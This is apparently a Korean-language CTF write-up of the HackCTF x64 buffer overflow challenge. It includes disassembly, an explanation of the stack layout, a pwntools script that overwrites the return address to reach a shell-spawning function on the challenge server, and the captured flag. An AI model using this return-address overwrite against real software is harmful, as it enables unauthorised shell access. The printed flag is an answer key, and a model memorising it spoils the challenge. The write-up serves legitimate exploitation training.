[HackCTF] x64 buffer overflow

WriteUp/HackCTF

[HackCTF] x64 buffer overflow

d2n0s4ur 2021. 8. 8. 13:56

callMeMaybe라는 함수를 호출하면 shell이 따지는 구조인 듯 하다.

Dump of assembler code for function callMeMaybe:
   0x0000000000400606 <+0>:     push   rbp
   0x0000000000400607 <+1>:     mov    rbp,rsp
   0x000000000040060a <+4>:     sub    rsp,0x20
   0x000000000040060e <+8>:     mov    QWORD PTR [rbp-0x20],0x400734
   0x0000000000400616 <+16>:    mov    QWORD PTR [rbp-0x18],0x40073e
   0x000000000040061e <+24>:    mov    QWORD PTR [rbp-0x10],0x0
   0x0000000000400626 <+32>:    mov    rax,QWORD PTR [rbp-0x20]
   0x000000000040062a <+36>:    lea    rcx,[rbp-0x20]
   0x000000000040062e <+40>:    mov    edx,0x0
   0x0000000000400633 <+45>:    mov    rsi,rcx
   0x0000000000400636 <+48>:    mov    rdi,rax
   0x0000000000400639 <+51>:    call   0x4004f8 <execve@plt>
   0x000000000040063e <+56>:    nop
   0x000000000040063f <+57>:    leave
   0x0000000000400640 <+58>:    ret
End of assembler dump.

callMeMaybe함수.

execve함수를 통해 bin/bash를 호출한다.

Dump of assembler code for function main:
   0x0000000000400641 <+0>:     push   rbp
   0x0000000000400642 <+1>:     mov    rbp,rsp
   0x0000000000400645 <+4>:     sub    rsp,0x120
   0x000000000040064c <+11>:    mov    DWORD PTR [rbp-0x114],edi
   0x0000000000400652 <+17>:    mov    QWORD PTR [rbp-0x120],rsi
   0x0000000000400659 <+24>:    lea    rax,[rbp-0x110]
   0x0000000000400660 <+31>:    mov    rsi,rax
   0x0000000000400663 <+34>:    mov    edi,0x400741
   0x0000000000400668 <+39>:    mov    eax,0x0
   0x000000000040066d <+44>:    call   0x400508 <__isoc99_scanf@plt>
   0x0000000000400672 <+49>:    lea    rax,[rbp-0x110]
   0x0000000000400679 <+56>:    mov    rdi,rax
   0x000000000040067c <+59>:    call   0x4004e0 <strlen@plt>
   0x0000000000400681 <+64>:    mov    DWORD PTR [rbp-0x4],eax
   0x0000000000400684 <+67>:    lea    rax,[rbp-0x110]
   0x000000000040068b <+74>:    mov    rsi,rax
   0x000000000040068e <+77>:    mov    edi,0x400744
   0x0000000000400693 <+82>:    mov    eax,0x0
   0x0000000000400698 <+87>:    call   0x4004e8 <printf@plt>
   0x000000000040069d <+92>:    mov    eax,0x0
   0x00000000004006a2 <+97>:    leave
   0x00000000004006a3 <+98>:    ret
End of assembler dump.

   0x0000000000400663 <+34>:    mov    edi,0x400741
   0x0000000000400668 <+39>:    mov    eax,0x0
   0x000000000040066d <+44>:    call   0x400508 <__isoc99_scanf@plt>
   0x0000000000400672 <+49>:    lea    rax,[rbp-0x110]

scanf함수를 통해 문자열을 받아온다. 이 문자열은 0x110만큼의 메모리를 차지한다.

   0x000000000040067c <+59>:    call   0x4004e0 <strlen@plt>
   0x0000000000400681 <+64>:    mov    DWORD PTR [rbp-0x4],eax

4byte의 공간에 입력받은 문자열의 길이를 저장한다.

   0x000000000040068e <+77>:    mov    edi,0x400744
   0x0000000000400693 <+82>:    mov    eax,0x0
   0x0000000000400698 <+87>:    call   0x4004e8 <printf@plt>

Hello {입력받은 문자열}을 출력한다.

STACK과 SFP를 넘어 RET에 callMeMaybe 함수의 주소가 저장되게 하면 된다.

from pwn import *

#p = process("./64bof_basic")
p = remote("ctf.j0n9hyun.xyz",3004)

addr = 0x0000000000400606
s = "\x90"*(0x110+8) + p64(addr)

p.sendline(s)
p.interactive()

0x110(문자열 바이트 수 ) + 4(strlen의 값이 저장되어있는 변수) + 4(SFP)

FLAG : HackCTF{64b17_b0f_15_51mpl3_700}